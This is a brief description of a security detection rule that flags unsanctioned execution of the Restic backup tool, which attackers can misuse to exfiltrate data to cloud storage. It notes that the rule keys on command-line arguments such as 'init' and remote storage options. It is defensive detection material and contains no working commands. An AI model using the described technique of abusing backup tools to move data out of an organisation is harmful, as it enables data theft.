This detection rule identifies the execution of the Restic backup tool, a legitimate utility that can be exploited by threat actors for data exfiltration. Restic allows users to create backups stored in various remote locations, including cloud services, which may be utilized by attackers to stealthily remove sensitive information from an organization. The presence of Restic, when not sanctioned for use in the enterprise environment, could serve as a significant indicator of potentially malicious activity, such as unauthorized data exfiltration or lateral movement within a network. The detection capabilities leverage command line arguments associated with the tool, such as 'init' and remote storage options, to establish whether the execution of the tool is part of a broader attack strategy. The rule focuses on specific command line patterns that could indicate malicious use of Restic, while also accounting for typical legitimate scenarios to minimize false positives.